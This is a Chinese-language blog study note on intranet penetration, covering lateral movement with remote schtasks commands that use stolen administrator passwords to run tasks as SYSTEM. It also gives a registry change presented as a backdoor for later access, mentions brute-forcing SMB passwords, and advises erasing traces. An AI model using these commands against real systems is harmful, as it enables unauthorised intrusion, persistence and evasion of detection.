记录内网渗透学习进程--DAY17
2021/5/5 7:26:06
本文主要是介绍记录内网渗透学习进程--DAY17,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
IPC+计划任务进⾏横向移动2 schtasks远程命令执⾏ 使⽤条件:启动Task Scheduler服务,获取目标的明文密码 至于怎么拿到目标的明文密码呢,SMB爆破和密码嗅探 在⽬标系统启动的时候以system运⾏命令schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr "cmd.exe /c whoami" /ru system /f
在⽬标系统建⽴⼀个任务,等待攻击者启动
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc DAILY /tr "cmd.exe /c whoami>c:\rules.log" /ru system /f
启动⽬标系统的test任务
schtasks /run /s <target ip> /u workgroup\administrator /p "<password>" /tn "test" /i
在⽬标系统启动的时候以system运⾏脚本
schtasks /create /s <target ip> /u workgroup\administrator /p "<password>" /tn test /sc onstart /tr c:\programdata\test.bat /ru system /f 查看⽬标建⽴的计划任务是否正确
schtasks /query /s <target ip> /u workgroup\administrator /p "<password>" | findstr test 删除⽬标已经建⽴的计划任务
schtasks /delete /s<target ip> /u workgroup\administrator /p "<password>" /tn "test" /f #用完一定要清理痕迹 问题点:
1.win7/win2008开始的uac导致⾮rid为500的都不能连 如果我们获取到了目标的权限后,可以在注册表上留下后面,方便我们日后再次连接
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
添加之后,我们是只可以make_token 明⽂,然后ls成功,测试⽬标机器是:win7,但是使⽤hash注⼊的话是不影响的。
2.win7/win2008开始的禁⽌at命令 (make_token之后,直接使⽤schtasks而不⽤密码可⾏否?hash注⼊之后呢?)
这篇关于记录内网渗透学习进程--DAY17的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-28一步到位:购买适合 SEO 的域名全攻略
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign学习入门:轻松掌握微服务通信
- 2024-12-27OpenFeign学习入门:轻松掌握微服务间的HTTP请求
- 2024-12-27JDK17新特性学习入门:简洁教程带你轻松上手
- 2024-12-27JMeter传递token学习入门教程
- 2024-12-27JMeter压测学习入门指南
- 2024-12-27JWT单点登录学习入门指南
- 2024-12-27JWT单点登录原理学习入门